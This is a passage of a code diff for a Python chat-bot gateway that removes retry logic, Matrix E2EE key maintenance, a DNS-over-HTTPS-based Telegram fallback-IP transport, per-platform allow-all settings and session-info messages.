@@ -619,23 +551,9 @@ class MatrixAdapter(BasePlatformAdapter):
|
||||
|
||||
async def _sync_loop(self) -> None:
|
||||
"""Continuously sync with the homeserver."""
|
||||
import nio
|
||||
|
||||
while not self._closing:
|
||||
try:
|
||||
resp = await self._client.sync(timeout=30000)
|
||||
if isinstance(resp, nio.SyncError):
|
||||
if self._closing:
|
||||
return
|
||||
logger.warning(
|
||||
"Matrix: sync returned %s: %s — retrying in 5s",
|
||||
type(resp).__name__,
|
||||
getattr(resp, "message", resp),
|
||||
)
|
||||
await asyncio.sleep(5)
|
||||
continue
|
||||
|
||||
await self._run_e2ee_maintenance()
|
||||
await self._client.sync(timeout=30000)
|
||||
except asyncio.CancelledError:
|
||||
return
|
||||
except Exception as exc:
|
||||
@@ -644,38 +562,6 @@ class MatrixAdapter(BasePlatformAdapter):
|
||||
logger.warning("Matrix: sync error: %s — retrying in 5s", exc)
|
||||
await asyncio.sleep(5)
|
||||
|
||||
async def _run_e2ee_maintenance(self) -> None:
|
||||
"""Run matrix-nio E2EE housekeeping between syncs.
|
||||
|
||||
Hermes uses a custom sync loop instead of matrix-nio's sync_forever(),
|
||||
so we need to explicitly drive the key management work that sync_forever()
|
||||
normally handles for encrypted rooms.
|
||||
"""
|
||||
client = self._client
|
||||
if not client or not self._encryption or not getattr(client, "olm", None):
|
||||
return
|
||||
|
||||
tasks = [asyncio.create_task(client.send_to_device_messages())]
|
||||
|
||||
if client.should_upload_keys:
|
||||
tasks.append(asyncio.create_task(client.keys_upload()))
|
||||
|
||||
if client.should_query_keys:
|
||||
tasks.append(asyncio.create_task(client.keys_query()))
|
||||
|
||||
if client.should_claim_keys:
|
||||
users = client.get_users_for_key_claiming()
|
||||
if users:
|
||||
tasks.append(asyncio.create_task(client.keys_claim(users)))
|
||||
|
||||
for task in asyncio.as_completed(tasks):
|
||||
try:
|
||||
await task
|
||||
except asyncio.CancelledError:
|
||||
raise
|
||||
except Exception as exc:
|
||||
logger.warning("Matrix: E2EE maintenance task failed: %s", exc)
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Event callbacks
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
@@ -407,38 +407,18 @@ class MattermostAdapter(BasePlatformAdapter):
|
||||
kind: str = "file",
|
||||
) -> SendResult:
|
||||
"""Download a URL and upload it as a file attachment."""
|
||||
import asyncio
|
||||
import aiohttp
|
||||
|
||||
last_exc = None
|
||||
file_data = None
|
||||
ct = "application/octet-stream"
|
||||
fname = url.rsplit("/", 1)[-1].split("?")[0] or f"{kind}.png"
|
||||
|
||||
for attempt in range(3):
|
||||
try:
|
||||
async with self._session.get(url, timeout=aiohttp.ClientTimeout(total=30)) as resp:
|
||||
if resp.status >= 500 or resp.status == 429:
|
||||
if attempt < 2:
|
||||
logger.debug("Mattermost download retry %d/2 for %s (status %d)",
|
||||
attempt + 1, url[:80], resp.status)
|
||||
await asyncio.sleep(1.5 * (attempt + 1))
|
||||
continue
|
||||
if resp.status >= 400:
|
||||
return await self.send(chat_id, f"{caption or ''}\n{url}".strip(), reply_to)
|
||||
file_data = await resp.read()
|
||||
ct = resp.content_type or "application/octet-stream"
|
||||
break
|
||||
except (aiohttp.ClientError, asyncio.TimeoutError) as exc:
|
||||
last_exc = exc
|
||||
if attempt < 2:
|
||||
await asyncio.sleep(1.5 * (attempt + 1))
|
||||
continue
|
||||
logger.warning("Mattermost: failed to download %s after %d attempts: %s", url, attempt + 1, exc)
|
||||
return await self.send(chat_id, f"{caption or ''}\n{url}".strip(), reply_to)
|
||||
|
||||
if file_data is None:
|
||||
logger.warning("Mattermost: download returned no data for %s", url)
|
||||
try:
|
||||
async with self._session.get(url, timeout=aiohttp.ClientTimeout(total=30)) as resp:
|
||||
if resp.status >= 400:
|
||||
# Fall back to sending the URL as text.
|
||||
return await self.send(chat_id, f"{caption or ''}\n{url}".strip(), reply_to)
|
||||
file_data = await resp.read()
|
||||
ct = resp.content_type or "application/octet-stream"
|
||||
# Derive filename from URL.
|
||||
fname = url.rsplit("/", 1)[-1].split("?")[0] or f"{kind}.png"
|
||||
except Exception as exc:
|
||||
logger.warning("Mattermost: failed to download %s: %s", url, exc)
|
||||
return await self.send(chat_id, f"{caption or ''}\n{url}".strip(), reply_to)
|
||||
|
||||
file_id = await self._upload_file(chat_id, file_data, fname, ct)
|
||||
|
||||
@@ -279,12 +279,6 @@ class SignalAdapter(BasePlatformAdapter):
|
||||
line = line.strip()
|
||||
if not line:
|
||||
continue
|
||||
# SSE keepalive comments (":") prove the connection
|
||||
# is alive — update activity so the health monitor
|
||||
# doesn't report false idle warnings.
|
||||
if line.startswith(":"):
|
||||
self._last_sse_activity = time.time()
|
||||
continue
|
||||
# Parse SSE data lines
|
||||
if line.startswith("data:"):
|
||||
data_str = line[5:].strip()
|
||||
|
||||
+19
-51
@@ -819,65 +819,33 @@ class SlackAdapter(BasePlatformAdapter):
|
||||
await self.handle_message(event)
|
||||
|
||||
async def _download_slack_file(self, url: str, ext: str, audio: bool = False) -> str:
|
||||
"""Download a Slack file using the bot token for auth, with retry."""
|
||||
import asyncio
|
||||
"""Download a Slack file using the bot token for auth."""
|
||||
import httpx
|
||||
|
||||
bot_token = self.config.token
|
||||
last_exc = None
|
||||
|
||||
async with httpx.AsyncClient(timeout=30.0, follow_redirects=True) as client:
|
||||
for attempt in range(3):
|
||||
try:
|
||||
response = await client.get(
|
||||
url,
|
||||
headers={"Authorization": f"Bearer {bot_token}"},
|
||||
)
|
||||
response.raise_for_status()
|
||||
response = await client.get(
|
||||
url,
|
||||
headers={"Authorization": f"Bearer {bot_token}"},
|
||||
)
|
||||
response.raise_for_status()
|
||||
|
||||
if audio:
|
||||
from gateway.platforms.base import cache_audio_from_bytes
|
||||
return cache_audio_from_bytes(response.content, ext)
|
||||
else:
|
||||
from gateway.platforms.base import cache_image_from_bytes
|
||||
return cache_image_from_bytes(response.content, ext)
|
||||
except (httpx.TimeoutException, httpx.HTTPStatusError) as exc:
|
||||
last_exc = exc
|
||||
if isinstance(exc, httpx.HTTPStatusError) and exc.response.status_code < 429:
|
||||
raise
|
||||
if attempt < 2:
|
||||
logger.debug("Slack file download retry %d/2 for %s: %s",
|
||||
attempt + 1, url[:80], exc)
|
||||
await asyncio.sleep(1.5 * (attempt + 1))
|
||||
continue
|
||||
raise
|
||||
raise last_exc
|
||||
if audio:
|
||||
from gateway.platforms.base import cache_audio_from_bytes
|
||||
return cache_audio_from_bytes(response.content, ext)
|
||||
else:
|
||||
from gateway.platforms.base import cache_image_from_bytes
|
||||
return cache_image_from_bytes(response.content, ext)
|
||||
|
||||
async def _download_slack_file_bytes(self, url: str) -> bytes:
|
||||
"""Download a Slack file and return raw bytes, with retry."""
|
||||
import asyncio
|
||||
"""Download a Slack file and return raw bytes."""
|
||||
import httpx
|
||||
|
||||
bot_token = self.config.token
|
||||
last_exc = None
|
||||
|
||||
async with httpx.AsyncClient(timeout=30.0, follow_redirects=True) as client:
|
||||
for attempt in range(3):
|
||||
try:
|
||||
response = await client.get(
|
||||
url,
|
||||
headers={"Authorization": f"Bearer {bot_token}"},
|
||||
)
|
||||
response.raise_for_status()
|
||||
return response.content
|
||||
except (httpx.TimeoutException, httpx.HTTPStatusError) as exc:
|
||||
last_exc = exc
|
||||
if isinstance(exc, httpx.HTTPStatusError) and exc.response.status_code < 429:
|
||||
raise
|
||||
if attempt < 2:
|
||||
logger.debug("Slack file download retry %d/2 for %s: %s",
|
||||
attempt + 1, url[:80], exc)
|
||||
await asyncio.sleep(1.5 * (attempt + 1))
|
||||
continue
|
||||
raise
|
||||
raise last_exc
|
||||
response = await client.get(
|
||||
url,
|
||||
headers={"Authorization": f"Bearer {bot_token}"},
|
||||
)
|
||||
response.raise_for_status()
|
||||
return response.content
|
||||
|
||||
@@ -11,7 +11,7 @@ import asyncio
|
||||
import logging
|
||||
import os
|
||||
import re
|
||||
from typing import Dict, List, Optional, Any
|
||||
from typing import Dict, Optional, Any
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
@@ -25,7 +25,6 @@ try:
|
||||
filters,
|
||||
)
|
||||
from telegram.constants import ParseMode, ChatType
|
||||
from telegram.request import HTTPXRequest
|
||||
TELEGRAM_AVAILABLE = True
|
||||
except ImportError:
|
||||
TELEGRAM_AVAILABLE = False
|
||||
@@ -35,7 +34,6 @@ except ImportError:
|
||||
Application = Any
|
||||
CommandHandler = Any
|
||||
TelegramMessageHandler = Any
|
||||
HTTPXRequest = Any
|
||||
filters = None
|
||||
ParseMode = None
|
||||
ChatType = None
|
||||
@@ -61,11 +59,6 @@ from gateway.platforms.base import (
|
||||
cache_document_from_bytes,
|
||||
SUPPORTED_DOCUMENT_TYPES,
|
||||
)
|
||||
from gateway.platforms.telegram_network import (
|
||||
TelegramFallbackTransport,
|
||||
discover_fallback_ips,
|
||||
parse_fallback_ip_env,
|
||||
)
|
||||
|
||||
|
||||
def check_telegram_requirements() -> bool:
|
||||
@@ -145,13 +138,6 @@ class TelegramAdapter(BasePlatformAdapter):
|
||||
# DM Topics config from extra.dm_topics
|
||||
self._dm_topics_config: List[Dict[str, Any]] = self.config.extra.get("dm_topics", [])
|
||||
|
||||
def _fallback_ips(self) -> list[str]:
|
||||
"""Return validated fallback IPs from config (populated by _apply_env_overrides)."""
|
||||
configured = self.config.extra.get("fallback_ips", []) if getattr(self.config, "extra", None) else []
|
||||
if isinstance(configured, str):
|
||||
configured = configured.split(",")
|
||||
return parse_fallback_ip_env(",".join(str(v) for v in configured) if configured else None)
|
||||
|
||||
@staticmethod
|
||||
def _looks_like_polling_conflict(error: Exception) -> bool:
|
||||
text = str(error).lower()
|
||||
@@ -488,26 +474,7 @@ class TelegramAdapter(BasePlatformAdapter):
|
||||
return False
|
||||
|
||||
# Build the application
|
||||
builder = Application.builder().token(self.config.token)
|
||||
fallback_ips = self._fallback_ips()
|
||||
if not fallback_ips:
|
||||
fallback_ips = await discover_fallback_ips()
|
||||
logger.info(
|
||||
"[%s] Auto-discovered Telegram fallback IPs: %s",
|
||||
self.name,
|
||||
", ".join(fallback_ips),
|
||||
)
|
||||
if fallback_ips:
|
||||
logger.warning(
|
||||
"[%s] Telegram fallback IPs active: %s",
|
||||
self.name,
|
||||
", ".join(fallback_ips),
|
||||
)
|
||||
transport = TelegramFallbackTransport(fallback_ips)
|
||||
request = HTTPXRequest(httpx_kwargs={"transport": transport})
|
||||
get_updates_request = HTTPXRequest(httpx_kwargs={"transport": transport})
|
||||
builder = builder.request(request).get_updates_request(get_updates_request)
|
||||
self._app = builder.build()
|
||||
self._app = Application.builder().token(self.config.token).build()
|
||||
self._bot = self._app.bot
|
||||
|
||||
# Register handlers
|
||||
@@ -707,15 +674,9 @@ class TelegramAdapter(BasePlatformAdapter):
|
||||
except ImportError:
|
||||
_NetErr = OSError # type: ignore[misc,assignment]
|
||||
|
||||
try:
|
||||
from telegram.error import BadRequest as _BadReq
|
||||
except ImportError:
|
||||
_BadReq = None # type: ignore[assignment,misc]
|
||||
|
||||
for i, chunk in enumerate(chunks):
|
||||
should_thread = self._should_thread_reply(reply_to, i)
|
||||
reply_to_id = int(reply_to) if should_thread else None
|
||||
effective_thread_id = int(thread_id) if thread_id else None
|
||||
|
||||
msg = None
|
||||
for _send_attempt in range(3):
|
||||
@@ -727,7 +688,7 @@ class TelegramAdapter(BasePlatformAdapter):
|
||||
text=chunk,
|
||||
parse_mode=ParseMode.MARKDOWN_V2,
|
||||
reply_to_message_id=reply_to_id,
|
||||
message_thread_id=effective_thread_id,
|
||||
message_thread_id=int(thread_id) if thread_id else None,
|
||||
)
|
||||
except Exception as md_error:
|
||||
# Markdown parsing failed, try plain text
|
||||
@@ -739,30 +700,12 @@ class TelegramAdapter(BasePlatformAdapter):
|
||||
text=plain_chunk,
|
||||
parse_mode=None,
|
||||
reply_to_message_id=reply_to_id,
|
||||
message_thread_id=effective_thread_id,
|
||||
message_thread_id=int(thread_id) if thread_id else None,
|
||||
)
|
||||
else:
|
||||
raise
|
||||
break # success
|
||||
except _NetErr as send_err:
|
||||
# BadRequest is a subclass of NetworkError in
|
||||
# python-telegram-bot but represents permanent errors
|
||||
# (not transient network issues). Detect and handle
|
||||
# specific cases instead of blindly retrying.
|
||||
if _BadReq and isinstance(send_err, _BadReq):
|
||||
err_lower = str(send_err).lower()
|
||||
if "thread not found" in err_lower and effective_thread_id is not None:
|
||||
# Thread doesn't exist — retry without
|
||||
# message_thread_id so the message still
|
||||
# reaches the chat.
|
||||
logger.warning(
|
||||
"[%s] Thread %s not found, retrying without message_thread_id",
|
||||
self.name, effective_thread_id,
|
||||
)
|
||||
effective_thread_id = None
|
||||
continue
|
||||
# Other BadRequest errors are permanent — don't retry
|
||||
raise
|
||||
if _send_attempt < 2:
|
||||
wait = 2 ** _send_attempt
|
||||
logger.warning("[%s] Network error on send (attempt %d/3), retrying in %ds: %s",
|
||||
|
||||
@@ -1,233 +0,0 @@
|
||||
"""Telegram-specific network helpers.
|
||||
|
||||
Provides a hostname-preserving fallback transport for networks where
|
||||
api.telegram.org resolves to an endpoint that is unreachable from the current
|
||||
host. The transport keeps the logical request host and TLS SNI as
|
||||
api.telegram.org while retrying the TCP connection against one or more fallback
|
||||
IPv4 addresses.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import ipaddress
|
||||
import logging
|
||||
import socket
|
||||
from typing import Iterable, Optional
|
||||
|
||||
import httpx
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
_TELEGRAM_API_HOST = "api.telegram.org"
|
||||
|
||||
# DNS-over-HTTPS providers used to discover Telegram API IPs that may differ
|
||||
# from the (potentially unreachable) IP returned by the local system resolver.
|
||||
_DOH_TIMEOUT = 4.0 # seconds — bounded so connect() isn't noticeably delayed
|
||||
|
||||
_DOH_PROVIDERS: list[dict] = [
|
||||
{
|
||||
"url": "https://dns.google/resolve",
|
||||
"params": {"name": _TELEGRAM_API_HOST, "type": "A"},
|
||||
"headers": {},
|
||||
},
|
||||
{
|
||||
"url": "https://cloudflare-dns.com/dns-query",
|
||||
"params": {"name": _TELEGRAM_API_HOST, "type": "A"},
|
||||
"headers": {"Accept": "application/dns-json"},
|
||||
},
|
||||
]
|
||||
|
||||
# Last-resort IPs when DoH is also blocked. These are stable Telegram Bot API
|
||||
# endpoints in the 149.154.160.0/20 block (same seed used by OpenClaw).
|
||||
_SEED_FALLBACK_IPS: list[str] = ["149.154.167.220"]
|
||||
|
||||
|
||||
class TelegramFallbackTransport(httpx.AsyncBaseTransport):
|
||||
"""Retry Telegram Bot API requests via fallback IPs while preserving TLS/SNI.
|
||||
|
||||
Requests continue to target https://api.telegram.org/... logically, but on
|
||||
connect failures the underlying TCP connection is retried against a known
|
||||
reachable IP. This is effectively the programmatic equivalent of
|
||||
``curl --resolve api.telegram.org:443:<ip>``.
|
||||
"""
|
||||
|
||||
def __init__(self, fallback_ips: Iterable[str], **transport_kwargs):
|
||||
self._fallback_ips = [ip for ip in dict.fromkeys(_normalize_fallback_ips(fallback_ips))]
|
||||
self._primary = httpx.AsyncHTTPTransport(**transport_kwargs)
|
||||
self._fallbacks = {
|
||||
ip: httpx.AsyncHTTPTransport(**transport_kwargs) for ip in self._fallback_ips
|
||||
}
|
||||
self._sticky_ip: Optional[str] = None
|
||||
self._sticky_lock = asyncio.Lock()
|
||||
|
||||
async def handle_async_request(self, request: httpx.Request) -> httpx.Response:
|
||||
if request.url.host != _TELEGRAM_API_HOST or not self._fallback_ips:
|
||||
return await self._primary.handle_async_request(request)
|
||||
|
||||
sticky_ip = self._sticky_ip
|
||||
attempt_order: list[Optional[str]] = [sticky_ip] if sticky_ip else [None]
|
||||
for ip in self._fallback_ips:
|
||||
if ip != sticky_ip:
|
||||
attempt_order.append(ip)
|
||||
|
||||
last_error: Exception | None = None
|
||||
for ip in attempt_order:
|
||||
candidate = request if ip is None else _rewrite_request_for_ip(request, ip)
|
||||
transport = self._primary if ip is None else self._fallbacks[ip]
|
||||
try:
|
||||
response = await transport.handle_async_request(candidate)
|
||||
if ip is not None and self._sticky_ip != ip:
|
||||
async with self._sticky_lock:
|
||||
if self._sticky_ip != ip:
|
||||
self._sticky_ip = ip
|
||||
logger.warning(
|
||||
"[Telegram] Primary api.telegram.org path unreachable; using sticky fallback IP %s",
|
||||
ip,
|
||||
)
|
||||
return response
|
||||
except Exception as exc:
|
||||
last_error = exc
|
||||
if not _is_retryable_connect_error(exc):
|
||||
raise
|
||||
if ip is None:
|
||||
logger.warning(
|
||||
"[Telegram] Primary api.telegram.org connection failed (%s); trying fallback IPs %s",
|
||||
exc,
|
||||
", ".join(self._fallback_ips),
|
||||
)
|
||||
continue
|
||||
logger.warning("[Telegram] Fallback IP %s failed: %s", ip, exc)
|
||||
continue
|
||||
|
||||
assert last_error is not None
|
||||
raise last_error
|
||||
|
||||
async def aclose(self) -> None:
|
||||
await self._primary.aclose()
|
||||
for transport in self._fallbacks.values():
|
||||
await transport.aclose()
|
||||
|
||||
|
||||
def _normalize_fallback_ips(values: Iterable[str]) -> list[str]:
|
||||
normalized: list[str] = []
|
||||
for value in values:
|
||||
raw = str(value).strip()
|
||||
if not raw:
|
||||
continue
|
||||
try:
|
||||
addr = ipaddress.ip_address(raw)
|
||||
except ValueError:
|
||||
logger.warning("Ignoring invalid Telegram fallback IP: %r", raw)
|
||||
continue
|
||||
if addr.version != 4:
|
||||
logger.warning("Ignoring non-IPv4 Telegram fallback IP: %s", raw)
|
||||
continue
|
||||
normalized.append(str(addr))
|
||||
return normalized
|
||||
|
||||
|
||||
def parse_fallback_ip_env(value: str | None) -> list[str]:
|
||||
if not value:
|
||||
return []
|
||||
parts = [part.strip() for part in value.split(",")]
|
||||
return _normalize_fallback_ips(parts)
|
||||
|
||||
|
||||
def _resolve_system_dns() -> set[str]:
|
||||
"""Return the IPv4 addresses that the OS resolver gives for api.telegram.org."""
|
||||
try:
|
||||
results = socket.getaddrinfo(_TELEGRAM_API_HOST, 443, socket.AF_INET)
|
||||
return {addr[4][0] for addr in results}
|
||||
except Exception:
|
||||
return set()
|
||||
|
||||
|
||||
async def _query_doh_provider(
|
||||
client: httpx.AsyncClient, provider: dict
|
||||
) -> list[str]:
|
||||
"""Query one DoH provider and return A-record IPs."""
|
||||
try:
|
||||
resp = await client.get(
|
||||
provider["url"], params=provider["params"], headers=provider["headers"]
|
||||
)
|
||||
resp.raise_for_status()
|
||||
data = resp.json()
|
||||
ips: list[str] = []
|
||||
for answer in data.get("Answer", []):
|
||||
if answer.get("type") != 1: # A record
|
||||
continue
|
||||
raw = answer.get("data", "").strip()
|
||||
try:
|
||||
ipaddress.ip_address(raw)
|
||||
ips.append(raw)
|
||||
except ValueError:
|
||||
continue
|
||||
return ips
|
||||
except Exception as exc:
|
||||
logger.debug("DoH query to %s failed: %s", provider["url"], exc)
|
||||
return []
|
||||
|
||||
|
||||
async def discover_fallback_ips() -> list[str]:
|
||||
"""Auto-discover Telegram API IPs via DNS-over-HTTPS.
|
||||
|
||||
Resolves api.telegram.org through Google and Cloudflare DoH, collects all
|
||||
unique IPs, and excludes the system-DNS-resolved IP (which is presumably
|
||||
unreachable on this network). Falls back to a hardcoded seed list when DoH
|
||||
is also unavailable.
|
||||
"""
|
||||
async with httpx.AsyncClient(timeout=httpx.Timeout(_DOH_TIMEOUT)) as client:
|
||||
doh_tasks = [_query_doh_provider(client, p) for p in _DOH_PROVIDERS]
|
||||
system_dns_task = asyncio.to_thread(_resolve_system_dns)
|
||||
results = await asyncio.gather(system_dns_task, *doh_tasks, return_exceptions=True)
|
||||
|
||||
# results[0] = system DNS IPs (set), results[1:] = DoH IP lists
|
||||
system_ips: set[str] = results[0] if isinstance(results[0], set) else set()
|
||||
|
||||
doh_ips: list[str] = []
|
||||
for r in results[1:]:
|
||||
if isinstance(r, list):
|
||||
doh_ips.extend(r)
|
||||
|
||||
# Deduplicate preserving order, exclude system-DNS IPs
|
||||
seen: set[str] = set()
|
||||
candidates: list[str] = []
|
||||
for ip in doh_ips:
|
||||
if ip not in seen and ip not in system_ips:
|
||||
seen.add(ip)
|
||||
candidates.append(ip)
|
||||
|
||||
# Validate through existing normalization
|
||||
validated = _normalize_fallback_ips(candidates)
|
||||
|
||||
if validated:
|
||||
logger.debug("Discovered Telegram fallback IPs via DoH: %s", ", ".join(validated))
|
||||
return validated
|
||||
|
||||
logger.info(
|
||||
"DoH discovery yielded no new IPs (system DNS: %s); using seed fallback IPs %s",
|
||||
", ".join(system_ips) or "unknown",
|
||||
", ".join(_SEED_FALLBACK_IPS),
|
||||
)
|
||||
return list(_SEED_FALLBACK_IPS)
|
||||
|
||||
|
||||
def _rewrite_request_for_ip(request: httpx.Request, ip: str) -> httpx.Request:
|
||||
original_host = request.url.host or _TELEGRAM_API_HOST
|
||||
url = request.url.copy_with(host=ip)
|
||||
headers = request.headers.copy()
|
||||
headers["host"] = original_host
|
||||
extensions = dict(request.extensions)
|
||||
extensions["sni_hostname"] = original_host
|
||||
return httpx.Request(
|
||||
method=request.method,
|
||||
url=url,
|
||||
headers=headers,
|
||||
stream=request.stream,
|
||||
extensions=extensions,
|
||||
)
|
||||
|
||||
|
||||
def _is_retryable_connect_error(exc: Exception) -> bool:
|
||||
return isinstance(exc, (httpx.ConnectTimeout, httpx.ConnectError))
|
||||
+13
-150
@@ -573,10 +573,6 @@ class GatewayRunner:
|
||||
session_id=old_session_id,
|
||||
honcho_session_key=honcho_session_key,
|
||||
)
|
||||
# Fully silence the flush agent — quiet_mode only suppresses init
|
||||
# messages; tool call output still leaks to the terminal through
|
||||
# _safe_print → _print_fn. Set a no-op to prevent that.
|
||||
tmp_agent._print_fn = lambda *a, **kw: None
|
||||
|
||||
# Build conversation history from transcript
|
||||
msgs = [
|
||||
@@ -958,20 +954,12 @@ class GatewayRunner:
|
||||
os.getenv(v)
|
||||
for v in ("TELEGRAM_ALLOWED_USERS", "DISCORD_ALLOWED_USERS",
|
||||
"WHATSAPP_ALLOWED_USERS", "SLACK_ALLOWED_USERS",
|
||||
"SIGNAL_ALLOWED_USERS", "SIGNAL_GROUP_ALLOWED_USERS",
|
||||
"EMAIL_ALLOWED_USERS",
|
||||
"SIGNAL_ALLOWED_USERS", "EMAIL_ALLOWED_USERS",
|
||||
"SMS_ALLOWED_USERS", "MATTERMOST_ALLOWED_USERS",
|
||||
"MATRIX_ALLOWED_USERS", "DINGTALK_ALLOWED_USERS",
|
||||
"GATEWAY_ALLOWED_USERS")
|
||||
)
|
||||
_allow_all = os.getenv("GATEWAY_ALLOW_ALL_USERS", "").lower() in ("true", "1", "yes") or any(
|
||||
os.getenv(v, "").lower() in ("true", "1", "yes")
|
||||
for v in ("TELEGRAM_ALLOW_ALL_USERS", "DISCORD_ALLOW_ALL_USERS",
|
||||
"WHATSAPP_ALLOW_ALL_USERS", "SLACK_ALLOW_ALL_USERS",
|
||||
"SIGNAL_ALLOW_ALL_USERS", "EMAIL_ALLOW_ALL_USERS",
|
||||
"SMS_ALLOW_ALL_USERS", "MATTERMOST_ALLOW_ALL_USERS",
|
||||
"MATRIX_ALLOW_ALL_USERS", "DINGTALK_ALLOW_ALL_USERS")
|
||||
)
|
||||
_allow_all = os.getenv("GATEWAY_ALLOW_ALL_USERS", "").lower() in ("true", "1", "yes")
|
||||
if not _any_allowlist and not _allow_all:
|
||||
logger.warning(
|
||||
"No user allowlists configured. All unauthorized users will be denied. "
|
||||
@@ -1982,12 +1970,6 @@ class GatewayRunner:
|
||||
f"Use /resume to browse and restore a previous session.\n"
|
||||
f"Adjust reset timing in config.yaml under session_reset."
|
||||
)
|
||||
try:
|
||||
session_info = self._format_session_info()
|
||||
if session_info:
|
||||
notice = f"{notice}\n\n{session_info}"
|
||||
except Exception:
|
||||
pass
|
||||
await adapter.send(
|
||||
source.chat_id, notice,
|
||||
metadata=getattr(event, 'metadata', None),
|
||||
@@ -2193,7 +2175,6 @@ class GatewayRunner:
|
||||
enabled_toolsets=["memory"],
|
||||
session_id=session_entry.session_id,
|
||||
)
|
||||
_hyg_agent._print_fn = lambda *a, **kw: None
|
||||
|
||||
loop = asyncio.get_event_loop()
|
||||
_compressed, _ = await loop.run_in_executor(
|
||||
@@ -2755,85 +2736,6 @@ class GatewayRunner:
|
||||
# Clear session env
|
||||
self._clear_session_env()
|
||||
|
||||
def _format_session_info(self) -> str:
|
||||
"""Resolve current model config and return a formatted info block.
|
||||
|
||||
Surfaces model, provider, context length, and endpoint so gateway
|
||||
users can immediately see if context detection went wrong (e.g.
|
||||
local models falling to the 128K default).
|
||||
"""
|
||||
from agent.model_metadata import get_model_context_length, DEFAULT_FALLBACK_CONTEXT
|
||||
|
||||
model = _resolve_gateway_model()
|
||||
config_context_length = None
|
||||
provider = None
|
||||
base_url = None
|
||||
api_key = None
|
||||
|
||||
try:
|
||||
cfg_path = _hermes_home / "config.yaml"
|
||||
if cfg_path.exists():
|
||||
import yaml as _info_yaml
|
||||
with open(cfg_path, encoding="utf-8") as f:
|
||||
data = _info_yaml.safe_load(f) or {}
|
||||
model_cfg = data.get("model", {})
|
||||
if isinstance(model_cfg, dict):
|
||||
raw_ctx = model_cfg.get("context_length")
|
||||
if raw_ctx is not None:
|
||||
try:
|
||||
config_context_length = int(raw_ctx)
|
||||
except (TypeError, ValueError):
|
||||
pass
|
||||
provider = model_cfg.get("provider") or None
|
||||
base_url = model_cfg.get("base_url") or None
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Resolve runtime credentials for probing
|
||||
try:
|
||||
runtime = _resolve_runtime_agent_kwargs()
|
||||
provider = provider or runtime.get("provider")
|
||||
base_url = base_url or runtime.get("base_url")
|
||||
api_key = runtime.get("api_key")
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
context_length = get_model_context_length(
|
||||
model,
|
||||
base_url=base_url or "",
|
||||
api_key=api_key or "",
|
||||
config_context_length=config_context_length,
|
||||
provider=provider or "",
|
||||
)
|
||||
|
||||
# Format context source hint
|
||||
if config_context_length is not None:
|
||||
ctx_source = "config"
|
||||
elif context_length == DEFAULT_FALLBACK_CONTEXT:
|
||||
ctx_source = "default — set model.context_length in config to override"
|
||||
else:
|
||||
ctx_source = "detected"
|
||||
|
||||
# Format context length for display
|
||||
if context_length >= 1_000_000:
|
||||
ctx_display = f"{context_length / 1_000_000:.1f}M"
|
||||
elif context_length >= 1_000:
|
||||
ctx_display = f"{context_length // 1_000}K"
|
||||
else:
|
||||
ctx_display = str(context_length)
|
||||
|
||||
lines = [
|
||||
f"◆ Model: `{model}`",
|
||||
f"◆ Provider: {provider or 'openrouter'}",
|
||||
f"◆ Context: {ctx_display} tokens ({ctx_source})",
|
||||
]
|
||||
|
||||
# Show endpoint for local/custom setups
|
||||
if base_url and ("localhost" in base_url or "127.0.0.1" in base_url or "0.0.0.0" in base_url):
|
||||
lines.append(f"◆ Endpoint: {base_url}")
|
||||
|
||||
return "\n".join(lines)
|
||||
|
||||
async def _handle_reset_command(self, event: MessageEvent) -> str:
|
||||
"""Handle /new or /reset command."""
|
||||
source = event.source
|
||||
@@ -2874,22 +2776,12 @@ class GatewayRunner:
|
||||
"session_key": session_key,
|
||||
})
|
||||
|
||||
# Resolve session config info to surface to the user
|
||||
try:
|
||||
session_info = self._format_session_info()
|
||||
except Exception:
|
||||
session_info = ""
|
||||
|
||||
if new_entry:
|
||||
header = "✨ Session reset! Starting fresh."
|
||||
return "✨ Session reset! I've started fresh with no memory of our previous conversation."
|
||||
else:
|
||||
# No existing session, just create one
|
||||
self.session_store.get_or_create_session(source, force_new=True)
|
||||
header = "✨ New session started!"
|
||||
|
||||
if session_info:
|
||||
return f"{header}\n\n{session_info}"
|
||||
return header
|
||||
return "✨ New session started!"
|
||||
|
||||
async def _handle_status_command(self, event: MessageEvent) -> str:
|
||||
"""Handle /status command."""
|
||||
@@ -3993,7 +3885,6 @@ class GatewayRunner:
|
||||
enabled_toolsets=["memory"],
|
||||
session_id=session_entry.session_id,
|
||||
)
|
||||
tmp_agent._print_fn = lambda *a, **kw: None
|
||||
|
||||
loop = asyncio.get_event_loop()
|
||||
compressed, _ = await loop.run_in_executor(
|
||||
@@ -4908,14 +4799,9 @@ class GatewayRunner:
|
||||
enabled_toolsets = sorted(_get_platform_tools(user_config, platform_key))
|
||||
|
||||
# Tool progress mode from config.yaml: "all", "new", "verbose", "off"
|
||||
# Falls back to env vars for backward compatibility.
|
||||
# YAML 1.1 parses bare `off` as boolean False — normalise before
|
||||
# the `or` chain so it doesn't silently fall through to "all".
|
||||
_raw_tp = user_config.get("display", {}).get("tool_progress")
|
||||
if _raw_tp is False:
|
||||
_raw_tp = "off"
|
||||
# Falls back to env vars for backward compatibility
|
||||
progress_mode = (
|
||||
_raw_tp
|
||||
user_config.get("display", {}).get("tool_progress")
|
||||
or os.getenv("HERMES_TOOL_PROGRESS_MODE")
|
||||
or "all"
|
||||
)
|
||||
@@ -4974,17 +4860,12 @@ class GatewayRunner:
|
||||
progress_queue.put(msg)
|
||||
|
||||
# Background task to send progress messages
|
||||
# Accumulates tool lines into a single message that gets edited.
|
||||
#
|
||||
# Threading metadata is platform-specific:
|
||||
# - Slack DM threading needs event_message_id fallback (reply thread)
|
||||
# - Telegram uses message_thread_id only for forum topics; passing a
|
||||
# normal DM/group message id as thread_id causes send failures
|
||||
# - Other platforms should use explicit source.thread_id only
|
||||
if source.platform == Platform.SLACK:
|
||||
_progress_thread_id = source.thread_id or event_message_id
|
||||
else:
|
||||
_progress_thread_id = source.thread_id
|
||||
# Accumulates tool lines into a single message that gets edited
|
||||
# For DM top-level Slack messages, source.thread_id is None but the
|
||||
# final reply will be threaded under the original message via reply_to.
|
||||
